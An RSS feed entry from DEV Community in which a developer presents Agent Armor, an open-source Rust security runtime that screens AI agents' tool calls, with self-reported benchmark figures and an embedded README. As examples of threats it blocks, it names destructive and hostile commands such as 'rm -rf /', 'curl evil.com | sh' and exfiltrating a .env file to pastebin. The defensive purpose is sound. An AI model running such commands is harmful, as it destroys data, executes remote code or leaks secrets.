<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Edoardo Bambini</title>
    <description>The latest articles on DEV Community by Edoardo Bambini (@edoardo_bambini_5badce6ff).</description>
    <link>https://dev.to/edoardo_bambini_5badce6ff</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/edoardo_bambini_5badce6ff"/>
    <language>en</language>
    <item>
      <title>I built an open-source zero-trust security runtime for AI agents. Here’s what I learned.</title>
      <dc:creator>Edoardo Bambini</dc:creator>
      <pubDate>Wed, 08 Apr 2026 06:32:40 +0000</pubDate>
      <link>https://dev.to/edoardo_bambini_5badce6ff/i-built-an-open-source-zero-trust-security-runtime-for-ai-agents-heres-what-i-learned-538e</link>
      <guid>https://dev.to/edoardo_bambini_5badce6ff/i-built-an-open-source-zero-trust-security-runtime-for-ai-agents-heres-what-i-learned-538e</guid>
      <description>&lt;p&gt;The problem nobody is talking about&lt;br&gt;
You give an AI agent access to your terminal. It can run shell commands, read your filesystem, query your database, call external APIs.&lt;br&gt;
Now ask yourself: what’s stopping it from running rm -rf /? Or curl evil.com | sh? Or exfiltrating your .env to a pastebin?&lt;br&gt;
The answer, for most teams right now, is nothing.&lt;br&gt;
Frameworks like LangChain, CrewAI, AutoGen, and Claude Code give agents the power to execute. But none of them govern what agents actually do with that power.&lt;br&gt;
I kept running into this gap while building IAGA, an LLM governance platform. So I built Agent Armor to fix it.&lt;br&gt;
What Agent Armor does&lt;br&gt;
Agent Armor is a zero-trust security runtime. Every single action an agent tries to perform passes through a deterministic 8-layer pipeline before anything touches your infrastructure. The verdict is always one of three: allow, review, or block.&lt;br&gt;
No LLM in the loop for decisions. No probabilistic guessing. Pure deterministic evaluation.&lt;br&gt;
Here’s what the 8 layers look like:&lt;br&gt;
    1.  Protocol DPI — Deep packet inspection for MCP, ACP, and HTTP function calls. Schema validation against registered tool definitions.&lt;br&gt;
    2.  Taint Tracking — Tracks data provenance through agent execution. Catches credential leaks and exfiltration attempts.&lt;br&gt;
    3.  NHI Registry — Non-human identity management with HMAC-SHA256 attestation. Every agent becomes a first-class identity.&lt;br&gt;
    4.  Risk Scoring — Adaptive 5-weight composite model: statistical, contextual, behavioral, temporal, reputation.&lt;br&gt;
    5.  Impact Analysis — Pre-execution risk assessment with command analysis and impact prediction.&lt;br&gt;
    6.  Policy Engine — Workspace-level rules: tool permissions, protocol restrictions, domain allowlists.&lt;br&gt;
    7.  Injection Firewall — 3-stage prompt injection defense: pattern matching, entropy analysis, structural validation.&lt;br&gt;
    8.  Observability — OpenTelemetry-compatible spans, real-time SSE stream, webhook integrations.&lt;br&gt;
On top of that, there’s response scanning for PII and secrets, per-agent rate limiting, behavioral fingerprinting, and a threat intelligence feed.&lt;br&gt;
The benchmark&lt;br&gt;
I didn’t want to ship this without hard numbers. We tested Agent Armor against 16 real-world scenarios (both attack and benign), 50 repetitions each, 800 total requests.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Result&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Decision accuracy&lt;/td&gt;
&lt;td&gt;99.8%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;False positives&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pipeline latency&lt;/td&gt;
&lt;td&gt;~2.4ms across all 8 layers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Risk score range&lt;/td&gt;
&lt;td&gt;1 to 88 (continuous, not binary)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Attack categories tested&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;A curl | sh scores 88. A chmod 777 scores 82. A prompt injection attempt scores 76. Every action gets a quantified risk score, not just a pass/fail.&lt;br&gt;
Why Rust&lt;br&gt;
I wanted governance decisions to be fast enough that agents don’t even notice the overhead. 2.4ms for 8 full security layers was only possible because the entire pipeline runs in Rust on Tokio, with no garbage collection pauses and no cold starts.&lt;br&gt;
The dashboard is embedded directly in the binary via include_str!(). No React, no webpack, no separate frontend build. One binary, zero frontend dependencies.&lt;br&gt;
Tech stack: Rust + Tokio, Axum 0.8, SQLite via sqlx, Argon2 auth, HMAC-SHA256 crypto, OpenTelemetry, SSE for real-time events.&lt;br&gt;
Getting started&lt;br&gt;
One command:&lt;/p&gt;

&lt;p&gt;docker compose up -d&lt;/p&gt;

&lt;p&gt;Or from source:&lt;/p&gt;

&lt;p&gt;git clone &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga.git" rel="noopener noreferrer"&gt;https://github.com/EdoardoBambini/Agent-Armor-Iaga.git&lt;/a&gt;&lt;br&gt;
cd Agent-Armor-Iaga/community&lt;br&gt;
cargo build --release&lt;br&gt;
./target/release/agent-armor serve&lt;/p&gt;

&lt;p&gt;It also works as an MCP proxy for Claude Desktop. Add it to your claude_desktop_config.json and every tool call passes through the pipeline before reaching your MCP server.&lt;br&gt;
Open-core model&lt;br&gt;
The full 8-layer pipeline, response scanning, rate limiting, fingerprinting, and threat intelligence are all open source under BUSL-1.1 (converts to Apache 2.0 after 4 years). Enterprise adds multi-tenant, SSO/SAML, SIEM integration, and advanced ML-powered injection detection.&lt;br&gt;
What I learned building this&lt;br&gt;
The biggest lesson: security for AI agents can’t work the same way traditional application security does. Agents are non-deterministic by nature, they take different paths every time, and they combine tools in ways you can’t predict upfront. That’s exactly why the governance layer needs to be deterministic. You need a system that evaluates every action on its own merits, in real time, regardless of what the agent “intended” to do.&lt;br&gt;
The second lesson: latency matters more than features. If your governance layer adds 500ms to every tool call, teams will disable it. At 2.4ms, it’s invisible.&lt;br&gt;
Try it, break it, tell me what’s wrong&lt;br&gt;
I’m actively developing this and would genuinely love feedback from this community. If you find a scenario Agent Armor handles badly, open an issue. If you think a layer is missing, tell me.&lt;br&gt;
And if you find it useful, a star on the repo helps more than you’d think for an early-stage open source project.&lt;/p&gt;


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/EdoardoBambini" rel="noopener noreferrer"&gt;
        EdoardoBambini
      &lt;/a&gt; / &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga" rel="noopener noreferrer"&gt;
        Agent-Armor-Iaga
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      AI agents are getting tool access — shell, file system, databases, APIs, secrets. But **nobody is governing what they actually do with it**.  Frameworks like LangChain, CrewAI, AutoGen, and Claude Code give agents the power to execute. Agent Armor gives you the power to control, audit, and approve every single action before it happens.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;div class="markdown-heading"&gt;
&lt;h1 class="heading-element"&gt;Agent Armor&lt;/h1&gt;
&lt;/div&gt;
&lt;p&gt;
  &lt;strong&gt;Zero-Trust Security Runtime for Autonomous AI Agents&lt;/strong&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga#quick-start" rel="noopener noreferrer"&gt;Quick Start&lt;/a&gt; •
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga#8-layer-security-stack" rel="noopener noreferrer"&gt;8 Layers&lt;/a&gt; •
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga#api-reference" rel="noopener noreferrer"&gt;API&lt;/a&gt; •
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga#dashboard" rel="noopener noreferrer"&gt;Dashboard&lt;/a&gt; •
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga#configuration" rel="noopener noreferrer"&gt;Config&lt;/a&gt; •
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga#architecture" rel="noopener noreferrer"&gt;Architecture&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga/actions" rel="noopener noreferrer"&gt;&lt;img src="https://github.com/EdoardoBambini/Agent-Armor-Iaga/actions/workflows/ci.yml/badge.svg" alt="CI"&gt;&lt;/a&gt;
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga/LICENSE" rel="noopener noreferrer"&gt;&lt;img src="https://camo.githubusercontent.com/82325d2338691fb872cdd71763f351b57c89b746aeafbf818427bd374f989a47/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f6c6963656e73652d4255534c2d2d312e312d626c7565" alt="License"&gt;&lt;/a&gt;
  &lt;a rel="noopener noreferrer nofollow" href="https://camo.githubusercontent.com/112044537cde2a67424211ee0e2bf748dd1ce7a979963ef5f95bdf02a73246df/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f727573742d312e37352532422d6f72616e6765"&gt;&lt;img src="https://camo.githubusercontent.com/112044537cde2a67424211ee0e2bf748dd1ce7a979963ef5f95bdf02a73246df/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f727573742d312e37352532422d6f72616e6765" alt="Rust"&gt;&lt;/a&gt;
  &lt;a href="https://www.iaga.tech" rel="nofollow noopener noreferrer"&gt;&lt;img src="https://camo.githubusercontent.com/17ce76b906658fb89f6e9bd30b95cb6968c82ad481cf263b8c3558f30ac6222b/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f736974652d696167612e746563682d707572706c65" alt="IAGA"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a rel="noopener noreferrer" href="https://github.com/EdoardoBambini/Agent-Armor-Iaga/assets/brain.gif"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fraw.githubusercontent.com%2FEdoardoBambini%2FAgent-Armor-Iaga%2FHEAD%2Fassets%2Fbrain.gif" alt="Agent Armor — Zero-Trust AI Agent Governance" width="600"&gt;&lt;/a&gt;
&lt;/p&gt;




&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;The Problem&lt;/h2&gt;
&lt;/div&gt;

&lt;p&gt;AI agents are getting tool access — shell, file system, databases, APIs, secrets. But &lt;strong&gt;nobody is governing what they actually do with it&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Frameworks like LangChain, CrewAI, AutoGen, and Claude Code give agents the power to execute. Agent Armor gives you the power to &lt;strong&gt;control, audit, and approve&lt;/strong&gt; every single action before it happens.&lt;/p&gt;

&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;Why Agent Armor&lt;/h2&gt;
&lt;/div&gt;

&lt;p&gt;&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;br&gt;
&lt;thead&gt;
&lt;br&gt;
&lt;tr&gt;
&lt;br&gt;
&lt;th&gt;Without Agent Armor&lt;/th&gt;
&lt;br&gt;
&lt;th&gt;With Agent Armor&lt;/th&gt;
&lt;br&gt;
&lt;/tr&gt;
&lt;br&gt;
&lt;/thead&gt;
&lt;br&gt;
&lt;tbody&gt;
&lt;br&gt;
&lt;tr&gt;
&lt;br&gt;
&lt;td&gt;Agent runs &lt;code&gt;rm -rf /&lt;/code&gt;&lt;br&gt;
&lt;/td&gt;
&lt;br&gt;
&lt;td&gt;Agent tries &lt;code&gt;rm -rf /&lt;/code&gt; → &lt;strong&gt;BLOCKED&lt;/strong&gt; at risk score 82&lt;/td&gt;
&lt;br&gt;
&lt;/tr&gt;
&lt;br&gt;
&lt;tr&gt;
&lt;br&gt;
&lt;td&gt;Agent runs &lt;code&gt;curl evil.com | sh&lt;/code&gt;&lt;br&gt;
&lt;/td&gt;
&lt;br&gt;
&lt;td&gt;8-layer composite scores it &lt;strong&gt;88/100&lt;/strong&gt; → highest threat tier&lt;/td&gt;
&lt;br&gt;
&lt;/tr&gt;
&lt;br&gt;
&lt;tr&gt;
&lt;br&gt;
&lt;td&gt;Agent exfiltrates secrets to Pastebin&lt;/td&gt;
&lt;br&gt;
&lt;td&gt;Injection firewall catches prompt attack → &lt;strong&gt;SAFE&lt;/strong&gt;&lt;br&gt;
&lt;/td&gt;
&lt;br&gt;
&lt;/tr&gt;
&lt;br&gt;
&lt;tr&gt;
&lt;br&gt;
&lt;td&gt;"How dangerous was that action?" → no answer&lt;/td&gt;
&lt;br&gt;
&lt;td&gt;Continuous risk scores 1-88 with per-layer breakdown → &lt;strong&gt;QUANTIFIED&lt;/strong&gt;&lt;br&gt;
&lt;/td&gt;
&lt;br&gt;
&lt;/tr&gt;
&lt;br&gt;
&lt;tr&gt;
&lt;br&gt;
&lt;td&gt;"What did&lt;/td&gt;
&lt;br&gt;
&lt;/tr&gt;
&lt;br&gt;
&lt;/tbody&gt;
&lt;br&gt;
&lt;/table&gt;&lt;/div&gt;…&lt;/p&gt;
&lt;/div&gt;
&lt;br&gt;
  &lt;/div&gt;
&lt;br&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/EdoardoBambini/Agent-Armor-Iaga" rel="noopener noreferrer"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;br&gt;
&lt;/div&gt;
&lt;br&gt;


&lt;p&gt;&lt;a href="http://www.iaga.tech" rel="noopener noreferrer"&gt;www.iaga.tech&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>rust</category>
      <category>security</category>
      <category>opensource</category>
    </item>
  </channel>
</rss>
